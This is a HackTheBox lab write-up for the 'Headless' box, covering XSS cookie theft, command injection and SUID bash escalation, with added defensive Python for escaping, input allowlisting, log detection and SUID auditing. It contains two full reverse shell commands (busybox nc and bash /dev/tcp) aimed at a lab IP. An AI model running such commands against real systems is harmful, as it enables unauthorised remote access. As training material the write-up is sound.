Headless – HackTheBox Writeup

HackTheBox Writeup – Headless (Linux) – Easy Difficulty

Introduction

Another easy box to start my day with. It’s been a long time since I’ve done an active machine that wasn’t a little harder than I needed it to be. A little client-side XSS, a little command injection – like a light jog around the block.

Enumeration / Initial Foothold

I start off with some port scanning:

rustscan 10.10.11.8 --range 1-65535 -- -A -sC -sV | tee nmap.txt

But it only reveals ports 22 and 5000.

Visiting the website, we see a countdown timer:

The link for questions takes us to a support request.

We can see that it reflects our input in some form – a lead towards XSS.

I am able to reflect an XSS alert – that’s great, but it doesn’t take us very far.

Other members of the HackTheBox community told me I should be focusing on client-side attacks. Since the error message says the request is forwarded to administrators, we can steal the administrator’s cookie with a stored XSS payload that I took from HackTricks:

Put this after the host header.

When opened, the XSS loads our server and sends us the cookie.

We can then take that cookie, append it to our own requests, and go to /dashboard.
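The root cause here is a support form whose content is stored and later rendered to an administrator without escaping, combined with a session cookie that script can read. The following is an added example from the defender's side, not code from the box or from this writeup: a Python rendering of the vulnerable pattern beside its escaped form, plus a session cookie built with HttpOnly, Secure and SameSite so that script running in the admin's browser cannot simply read it out. The field names, the sample message and the cookie name are constructed for the example.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample input of the kind a support form receives.
# The real field names on the box are not known; "name"/"message" are assumed.
SAMPLE_MESSAGE = "<script>alert(1)</script>"


def render_support_message_unsafe(name: str, message: str) -> str:
    """Vulnerable pattern: user input spliced straight into HTML.

    Anything stored this way and later shown to an administrator is a
    stored XSS sink, which is exactly what the writeup abuses.
    """
    return f"<p>From {name}: {message}</p>"


def render_support_message_safe(name: str, message: str) -> str:
    """Hardened pattern: HTML-escape every untrusted value at output time."""
    return f"<p>From {html.escape(name)}: {html.escape(message)}</p>"


def session_cookie_header(session_value: str) -> str:
    """Build a Set-Cookie header carrying HttpOnly, Secure and SameSite.

    HttpOnly keeps the cookie out of document.cookie, so even a script that
    does run in the admin's browser cannot read the session value directly.
    """
    jar = SimpleCookie()
    jar["session"] = session_value          # cookie name is assumed
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Lax"
    return jar.output(header="Set-Cookie:").strip()


def cookie_is_hardened(set_cookie_header: str) -> bool:
    """Check a Set-Cookie header for the flags a session cookie should carry."""
    lowered = set_cookie_header.lower()
    return "httponly" in lowered and "secure" in lowered and "samesite=" in lowered


if __name__ == "__main__":
    print(render_support_message_unsafe("guest", SAMPLE_MESSAGE))  # script tag intact
    print(render_support_message_safe("guest", SAMPLE_MESSAGE))    # &lt;script&gt; ... escaped
    header = session_cookie_header("constructed-session-id")
    print(header, "hardened" if cookie_is_hardened(header) else "NOT hardened")
```

Escaping at output time, rather than trying to filter inputs, is what closes the sink regardless of where the stored text later ends up; the cookie flags are the defence-in-depth layer for the case where some other script injection still gets through.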

Then we can execute a command injection using the “|” character.

I used busybox to get a reverse shell, as the nc mkfifo one-liner wasn’t working: busybox nc 10.10.14.2 9001 -e bash. Other utilities would work as well.
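The dashboard passes a user-controlled value into a shell, which is why a “|” turns one command into two. As an added example (not the box’s code and not from this writeup), the Python below shows the vulnerable string-building pattern next to the hardened version, which allowlists the value and hands it to subprocess as its own argv entry, and finishes with a small detector that flags shell metacharacters in query parameters from constructed access-log lines. The script path, the `date` parameter name and the log lines are all assumptions for the example.

```python
import re
import subprocess
from urllib.parse import parse_qs, unquote, urlsplit

# Allowlist for the one value the endpoint needs (assumed YYYY-MM-DD format).
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")
# Characters that let a shell chain or redirect commands.
SHELL_META = re.compile(r"[|;&`$<>\n]")

REPORT_SCRIPT = "/opt/reports/report.sh"  # assumed path, not taken from the box


def build_shell_command_unsafe(date: str) -> str:
    """Vulnerable pattern: the value becomes part of a single shell string.

    Given to a shell, "2024-01-01 | id" runs report.sh and then id.
    Shown only to make the bug visible; nothing here executes it.
    """
    return f"{REPORT_SCRIPT} {date}"


def build_argv_safe(date: str) -> list:
    """Hardened pattern: reject anything outside the allowlist, then keep the
    value as a separate argv element so no shell ever parses it."""
    if not DATE_RE.fullmatch(date):
        raise ValueError(f"rejected report date: {date!r}")
    return [REPORT_SCRIPT, date]


def run_report_safe(date: str) -> subprocess.CompletedProcess:
    # shell=False is the default: "|" would just be a character inside argv[1].
    return subprocess.run(build_argv_safe(date), capture_output=True, text=True, check=False)


# Constructed access-log lines (combined format) for the detector below.
SAMPLE_LOG = [
    '10.10.14.2 - - [01/Jan/2024:10:00:00 +0000] "GET /dashboard?date=2024-01-01 HTTP/1.1" 200 512',
    '10.10.14.2 - - [01/Jan/2024:10:00:05 +0000] "GET /dashboard?date=2024-01-01%7Cid HTTP/1.1" 200 640',
    '10.10.14.2 - - [01/Jan/2024:10:00:09 +0000] "GET /dashboard?date=2024-01-01%3Bwhoami HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_injection_attempts(lines):
    """Return (line, parameter, decoded value) for each query value that
    carries shell metacharacters after URL decoding."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                decoded = unquote(value)  # second decode catches double-encoded values
                if SHELL_META.search(decoded):
                    hits.append((line, param, decoded))
    return hits


if __name__ == "__main__":
    print(build_argv_safe("2024-01-01"))
    for line, param, value in flag_injection_attempts(SAMPLE_LOG):
        print(f"suspicious {param}={value!r} in: {line}")
```

Only GET parameters show up in a standard access log, so a form posted to /dashboard would need request-body logging or application-level logging to be caught the same way; the allowlist check in build_argv_safe is the control that actually stops the injection.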

Privilege Escalation

After running Linux Smart Enumeration, I thought I was dreaming.

Yes, we have SUID bash – excellent! And we can easily use it to run any shell:

bash -i >& /dev/tcp/10.10.14.2/81 0>&1
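A SUID bit on a shell or interpreter hands root to anyone who can run the file, so it is worth checking for routinely rather than discovering it during a pentest. The audit below is an added example (not from the box or from this writeup) that walks a filesystem tree, looks for the setuid bit on regular files, and reports only those whose name is a shell or scripting interpreter; the list of names is an assumption chosen for the example and can be extended.

```python
import os
import stat
import sys

# Binaries that give a full shell or arbitrary code execution the moment
# they run setuid. Assumed list for the example; extend as needed.
RISKY_SUID_NAMES = {
    "bash", "sh", "dash", "zsh", "ksh",
    "perl", "python", "python3", "ruby", "php", "node",
}


def is_risky_suid(name: str, mode: int) -> bool:
    """True if the mode has the setuid bit and the name is a shell/interpreter."""
    if not mode & stat.S_ISUID:
        return False
    base = os.path.basename(name)
    # Strip version suffixes so python3.11 or perl5.36 still match.
    return base in RISKY_SUID_NAMES or base.rstrip("0123456789.") in RISKY_SUID_NAMES


def find_risky_suid(root: str = "/") -> list:
    """Walk root and return paths of setuid shells/interpreters."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue  # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and is_risky_suid(fn, st.st_mode):
                hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    found = find_risky_suid(root)
    for path in found:
        print(f"setuid shell/interpreter: {path}")
    # Non-zero exit lets a cron job or CI step fail loudly.
    sys.exit(1 if found else 0)
```

Running this from a scheduled job and alerting on a non-zero exit turns a finding like the one above into a ticket the same day the bit is set, instead of a surprise during the next assessment.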

Mission accomplished.

Lessons Learned

  • Anything that gets “sent to the administrators” or similar should be considered a possible vector for a client-side attack.
  • Insecure implementations should not be merely hidden behind authenticated access – even if they can’t be fixed, always consider defence in depth.

Song Of The Day – Self Control by Laura Branigan (1984)